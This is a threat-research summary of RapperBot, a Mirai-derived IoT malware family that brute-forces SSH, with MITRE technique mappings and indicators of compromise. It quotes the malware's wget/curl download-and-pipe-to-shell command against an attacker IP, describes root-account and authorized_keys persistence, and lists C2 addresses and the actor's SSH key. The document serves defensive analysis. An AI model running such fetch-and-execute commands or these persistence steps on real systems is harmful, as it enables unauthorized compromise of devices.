Threat Research

So RapperBot, What Ya Bruting For? | FortiGuard Labs

Securonix

FortiGuard Labs tracks RapperBot, a rapidly evolving IoT malware family that borrows heavily from Mirai but switches from Telnet to SSH brute forcing for initial access on Linux devices. The campaign shows notable persistence and credential-access capabilities, including SSH key-based persistence and root-privilege additions, with unclear ultimate motives.
#RapperBot #Mirai #FortiGuardLabs #SSH #Linux #Fortinet

Keypoints

  • RapperBot is an IoT malware family evolving since June 2022, derived from Mirai but focused on SSH brute forcing instead of Telnet.
  • The malware increasingly emphasizes persistence, enabling continued SSH access after reboot or removal by manipulating authorized_keys.
  • Early samples attempted self-propagation via a remote loader, but later samples removed this capability and focused on retaining access to brute-forced SSH servers.
  • RapperBot targets multiple architectures (ARM, MIPS, SPARC, x86) and uses an SSH 2.0 client with Diffie-Hellmann key exchange and AES128-CTR for authentication.
  • It identifies itself to SSH servers with the client string “SSH-2.0-HELLOWORLD” and retrieves credential lists from the C2 server, sometimes on ports 4343–4345.
  • After brute-forcing, valid credentials are reported back to the C2 on a separate port (currently 48109); the network protocol and command set govern registration, keep-alive, and very limited DoS actions.

MITRE Techniques

  • [T1110] Brute Force – RapperBot exclusively scans and attempts to brute force SSH servers configured to accept password authentication. “exclusively scans and attempts to brute force SSH servers configured to accept password authentication.”
  • [T1027] Obfuscated/Compressed Files and Information – The latest samples implemented an XOR encoding layer to hide strings from memory scanners during execution. “additional layer of Mirai-style XOR encoding to hide these strings from memory scanners during execution.”
  • [T1136] Create Account – The malware adds a root user (“suhelper”) via /etc/passwd and /etc/shadow to retain access. “root user ‘suhelper’ by directly writing to ‘/etc/passwd’ and ‘/etc/shadow/’.”
  • [T1098] Account Manipulation – RapperBot modifies the victim’s authorized_keys to maintain SSH access, including adding its public key with a persistent comment. “replace remote victims’ ~/.ssh/authorized_keys with one containing the threat actors’ SSH public key with the comment ‘helloworld’.”
  • [T1105] Ingress Tool Transfer – Early behavior included downloading and executing payloads via wget/curl, indicating loader-like download activity. “wget http://2[.]58[.]149[.]116/w -O- | sh; curl http://2[.]58[.]149[.]116/c -O- | sh.”
  • [T1071] Application Layer Protocol – C2 communications over TCP to receive commands, download credentials, and report results (e.g., port 443 in latest samples). “RapperBot communicates with its C2 server via TCP requests at separate ports to receive commands (443 in the latest samples).”

Indicators of Compromise

  • [File Hashes] 92ae77e9dd22e7680123bb230ce43ef602998e6a1c6756d9e2ce5822a09b37b4, a31f4caa0be9e588056c92fd69c8ac970ebc7e85a68615b1d9407a954d4df45a, and 2 more hashes
  • [Download URLs] hxxp://31[.]44[.]185[.]235/x86, hxxp://31[.]44[.]185[.]235/mips, and 6 more URLs
  • [C2] 31[.]44[.]185[.]235, 2[.]58[.]149[.]116, and other IPs
  • [SSH Public Key] Threat Actor SSH public key: AAAAB3NzaC1yc2EAAAADAQABAAACAQC/yU0iqklqw6etPlUon4mZzxslFWq8G8sRyluQMD3i8tpQWT2cX/mwGgSRCz7HMLyxt87olYIPemTIRBiyqk8SLD3ijQpfZwQ9vsHc47hdTBfj89FeHJGGm1KpWg8lrXeMW+5jIXTFmEFhbJ18wc25Dcds4QCM0DvZGr/Pg4+kqJ0gLyqYmB2fdNzBcU05QhhWW6tSuYcXcyAz8Cp73JmN6TcPuVqHeFYDg05KweYqTqThFFHbdxdqqrWy6fNt8q/cgI30NBa5W2LyZ4b1v6324IEJuxImARIxTc96Igaf30LUza8kbZyc3bewY6IsFUN1PjQJcJi0ubVLyWyyJ554Tv8BBfPdY4jqCr4PzaJ2Rc1JFJYUSVVT4yX2p7L6iRpW212eZmqLMSoR5a2a/tO2s1giIlb+0EHtFWc2QH7yz/ZBjnun7opIoslLVvYJ9cxMoLeLr5Ig+zny+IEA3x090xtcL62X0jea6btVnYo7UN2BARziisZze6oVuOTCBijuyvOM6ROZ6s/wl4CQAOSLDeFIP5L1paP9V1XLaYLD BAodNaUPFfTxggH3tZrnnU8Dge5/1JNa08F3WNUPM1S1x8L2HMatwc82x35jXyBSp3AMbdxMPhvyYI8v2J1PqJH8OqGTVjdWe40mD2osRgLo1EOfP/SFBTD5VEo95K2ZLQ==
  • [Threat Actor SSH public key] (same key as above) – used in authorized_keys

Read more: https://www.fortinet.com/blog/threat-research/rapperbot-malware-discovery